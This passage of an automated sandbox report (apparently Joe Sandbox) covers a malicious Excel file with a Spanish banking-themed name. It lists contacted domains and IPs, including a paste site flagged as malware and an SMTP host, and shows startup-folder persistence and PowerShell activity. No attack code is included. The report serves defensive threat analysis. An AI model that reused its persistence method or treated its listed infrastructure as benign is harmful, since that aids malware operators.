https://dataservice.o365filtering.com/	0%	URL Reputation	safe
http://api.ipify	0%	Avira URL Cloud	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
http://ocsp.sectigo.com0A	0%	URL Reputation	safe
http://ocsp.sectigo.com0A	0%	URL Reputation	safe
http://ocsp.sectigo.com0A	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
http://pastex.pro	100%	Avira URL Cloud	malware
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pastex.pro	45.148.121.68	true	false	2%, Virustotal, Browse	unknown
elb097307-934924932.us-east-1.elb.amazonaws.com	54.225.220.115	true	false		high
us2.smtp.mailhostbox.com	208.91.199.223	true	false		high
raw.githubusercontent.com	185.199.108.133	true	false	0%, Virustotal, Browse	unknown
seyranikenger.com.tr	185.162.146.6	true	false		unknown
smtp.saleforceconsults.com	unknown	unknown	true		unknown
api.ipify.org	unknown	unknown	false		high
www.seyranikenger.com.tr	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://login.microsoftonline.com/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://shell.suite.office.com:1443	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://us2.smtp.mailhostbox.com	a.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmp	false		high
https://autodiscover-s.outlook.com/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://cdn.entity.	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://wus2-000.contentsync.	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://powerlift.acompli.net	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://cortana.ai	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false		high
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://api.aadrm.com/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/cThe	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://api.ipify.orgD	a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://api.microsoftstream.com/api/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://cr.office.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://www.galapagosdesign.com/DPlease	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://api.ipify.org4	a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://portal.office.com/account/?ref=ClientMeControl	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	a.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.818610560.0000000004C71000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmp	false		high
https://ecs.office.com/config/v2/Office	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://graph.ppe.windows.net	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://officeci.azurewebsites.net/api/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://store.office.cn/addinstemplate	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://wus2-000.pagecontentsync.	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	false		high
https://go.micro	powershell.exe, 0000000A.00000003.789977084.0000000005699000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://globaldisco.crm.dynamics.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://store.officeppe.com/addinstemplate	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://raw.githubusercontent.com4	a.exe, 00000001.00000002.709635511.00000000027D3000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.772094694.00000000028B3000.00000004.00000001.sdmp, a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.odwebp.svc.ms	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://web.microsoftstream.com/video/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://graph.windows.net	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://dataservice.o365filtering.com/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	false		high
http://api.ipify	a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://officesetup.getmicrosoftkey.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://www.carterandcone.coml	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://prod-global-autodetect.acompli.net/autodetect	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false		high
https://outlook.office365.com/autodiscover/autodiscover.json	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://www.newtonsoft.com/jsonschema	a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	false		high
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://ocsp.sectigo.com0A	a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://weather.service.msn.com/data.aspx	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://apis.live.net/v5.0/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://pastex.pro	a.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://management.azure.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://www.fontbureau.com/designersG	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false		high
https://incidents.diagnostics.office.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://www.fontbureau.com/designers/?	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false		high
https://github.com/Pester/PesterP	powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/ios	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://www.fontbureau.com/designers?	a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false		high
https://insertmedia.bing.office.net/odc/insertmedia	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://api.office.net	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://incidents.diagnosticssdf.office.com	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
http://www.tiro.com	a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://asgsmsproxyapi.azurewebsites.net/	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	false		high
https://www.newtonsoft.com/json	a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
45.148.121.68	unknown	Netherlands	64425	SKB-ENTERPRISENL	false
54.225.220.115	unknown	United States	14618	AMAZON-AESUS	false
185.199.108.133	unknown	Netherlands	54113	FASTLYUS	false
208.91.199.223	unknown	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
185.162.146.6	unknown	Turkey	60721	BURSABILTR	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356267
Start date:	22.02.2021
Start time:	20:33:48
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	LIQUIDACION INTERBANCARIA 02_22_2021.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.expl.evad.winXLS@21/14@13/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.1% (good quality ratio 0.1%) Quality average: 88% Quality standard deviation: 8.5%
HCA Information:	Successful, ratio: 97% Number of executed functions: 435 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to French - France Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 51.104.139.180, 13.64.90.137, 13.107.5.88, 13.107.42.23, 104.43.139.144, 23.210.249.50, 184.30.21.144, 52.147.198.201, 104.43.193.48, 52.109.32.63, 52.109.12.23, 52.109.76.34, 2.20.142.210, 2.20.142.209, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, afdo-tas-offload.trafficmanager.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, prod-w.nexus.live.com.akadns.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, config.edge.skype.com, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, config.officeapps.live.com, l-0014.l-msedge.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:35:03	API Interceptor	269x Sleep call for process: a.exe modified
20:35:14	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
20:35:36	API Interceptor	29x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.148.121.68	Vessel Line Up 7105082938.exe	Get hash	malicious	Browse	pastex.pro/b/gmtdfmhFj
45.148.121.68	dwg.exe	Get hash	malicious	Browse	pastex.pro/b/rTfceghKr
54.225.220.115	2e00000.dll	Get hash	malicious	Browse	api.ipify.org/?format=xml
	0112_80556334.doc	Get hash	malicious	Browse	api.ipify.org/
	0112_528419802.doc	Get hash	malicious	Browse	api.ipify.org/
	Our New Order Jan 12 2020 at 2.30_PVV940_PDF.exe	Get hash	malicious	Browse	api.ipify.org/
	SecuriteInfo.com.Mal.Generic-S.23822.exe	Get hash	malicious	Browse	api.ipify.org/
	nwamamassloga.exe	Get hash	malicious	Browse	api.ipify.org/
	TIRNAK.exe	Get hash	malicious	Browse	api.ipify.org/
	ZfiNFIGegX.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	26-11-20_Dhl_Signed_document-pdf.exe	Get hash	malicious	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
elb097307-934924932.us-east-1.elb.amazonaws.com	nigolas.exe	Get hash	malicious	Browse	50.19.96.218
	RTM DIAS - CTM.exe	Get hash	malicious	Browse	54.235.142.93
	NitroGenerator.exe	Get hash	malicious	Browse	54.225.66.103
	SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls	Get hash	malicious	Browse	23.21.76.253
	SecuriteInfo.com.Heur.11266.xls	Get hash	malicious	Browse	54.235.142.93
	Sign-636.xls	Get hash	malicious	Browse	54.221.253.252
	Sign-709986424_219667767.xls	Get hash	malicious	Browse	54.235.83.248
	Sign-707465831_1420670581.xls	Get hash	malicious	Browse	54.235.83.248
	BANK SWIFT- USD 98,712.00.pdf.exe	Get hash	malicious	Browse	23.21.126.66
	Sign_1136845514-2138034493.xls	Get hash	malicious	Browse	54.221.253.252
	drWcfynA5k.exe	Get hash	malicious	Browse	54.235.83.248
	Purchase Order KVRQ-743012021.doc	Get hash	malicious	Browse	23.21.48.44
	SecuriteInfo.com.Exploit.Siggen3.10048.21085.xls	Get hash	malicious	Browse	23.21.126.66
	SecuriteInfo.com.Exploit.Siggen3.10048.29300.xls	Get hash	malicious	Browse	54.235.83.248
	0217_1737094153981.doc	Get hash	malicious	Browse	54.221.253.252
	DocuSign_167.xls	Get hash	malicious	Browse	23.21.76.253
	SecuriteInfo.com.CAP_HookExKeylogger.18513.exe	Get hash	malicious	Browse	23.21.76.253
	SecuriteInfo.com.Variant.Bulz.361092.7175.exe	Get hash	malicious	Browse	50.19.252.36
	Hs52qascx.dll	Get hash	malicious	Browse	50.19.252.36
	DocuSign_139380140_1184163298.xls	Get hash	malicious	Browse	54.225.220.115
pastex.pro	Vessel Line Up 7105082938.exe	Get hash	malicious	Browse	45.148.121.68
pastex.pro	dwg.exe	Get hash	malicious	Browse	45.148.121.68
us2.smtp.mailhostbox.com	SecuriteInfo.com.Trojan.Packed2.42850.3598.exe	Get hash	malicious	Browse	208.91.199.225
	SecuriteInfo.com.Trojan.Inject4.6572.1879.exe	Get hash	malicious	Browse	208.91.199.224
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	208.91.199.225
	ffkjg5CVrO.exe	Get hash	malicious	Browse	208.91.198.143
	7Lf8J7h7os.exe	Get hash	malicious	Browse	208.91.199.223
	Shipping Details_PDF.exe	Get hash	malicious	Browse	208.91.198.143
	YKRAB010B_KHE_Preminary Packing List.xlsx.exe	Get hash	malicious	Browse	208.91.199.225
	RTM DIAS - CTM.exe	Get hash	malicious	Browse	208.91.198.143
	AWB & Shipping Doc.exe	Get hash	malicious	Browse	208.91.199.223
	AWB & Shipping Doc.exe	Get hash	malicious	Browse	208.91.198.143
	PAYMENT INVOICE-9876543456789.exe	Get hash	malicious	Browse	208.91.199.224
	SecuriteInfo.com.Artemis249E62CF9BAE.exe	Get hash	malicious	Browse	208.91.198.143
	inquiry.doc	Get hash	malicious	Browse	208.91.199.224
	SOA.exe	Get hash	malicious	Browse	208.91.199.224
	SecuriteInfo.com.Artemis1A08A3826D57.exe	Get hash	malicious	Browse	208.91.199.225
	BL COPY.exe	Get hash	malicious	Browse	208.91.198.143
	ELASTA-PL-INV-2021024.exe	Get hash	malicious	Browse	208.91.199.225
	SecuriteInfo.com.CAP_HookExKeylogger.31203.exe	Get hash	malicious	Browse	208.91.199.224
	SWIFT COPY $27,078.exe	Get hash	malicious	Browse	208.91.199.225
	SWIFT COPY 27078.exe	Get hash	malicious	Browse	208.91.199.224

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-AESUS	nigolas.exe	Get hash	malicious	Browse	50.19.96.218
	X1(1).xlsm	Get hash	malicious	Browse	34.226.34.190
	X1(1).xlsm	Get hash	malicious	Browse	100.24.200.179
	X1(1).xlsm	Get hash	malicious	Browse	52.200.32.3
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	3.223.115.185
	message_zdm (2).html	Get hash	malicious	Browse	52.44.242.176
	002.docx	Get hash	malicious	Browse	34.192.7.28
	002.docx	Get hash	malicious	Browse	52.20.197.7
	Small Charities.xlsx	Get hash	malicious	Browse	3.229.228.113
	Small Charities.xlsx	Get hash	malicious	Browse	3.209.197.155
	CX2 RFQ.xlsm	Get hash	malicious	Browse	34.226.34.190
	CX2 RFQ.xlsm	Get hash	malicious	Browse	52.200.32.3
	CX2 RFQ.xlsm	Get hash	malicious	Browse	100.24.200.179
	RTM DIAS - CTM.exe	Get hash	malicious	Browse	54.235.142.93
	avast_secure_browser_setup.exe	Get hash	malicious	Browse	54.164.225.86
	AgroAG008021921doc_pdf.exe	Get hash	malicious	Browse	52.0.217.44
	NitroGenerator.exe	Get hash	malicious	Browse	54.225.66.103
	SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls	Get hash	malicious	Browse	23.21.76.253
	SecuriteInfo.com.Heur.11266.xls	Get hash	malicious	Browse	54.235.142.93
	Sign-636.xls	Get hash	malicious	Browse	54.221.253.252
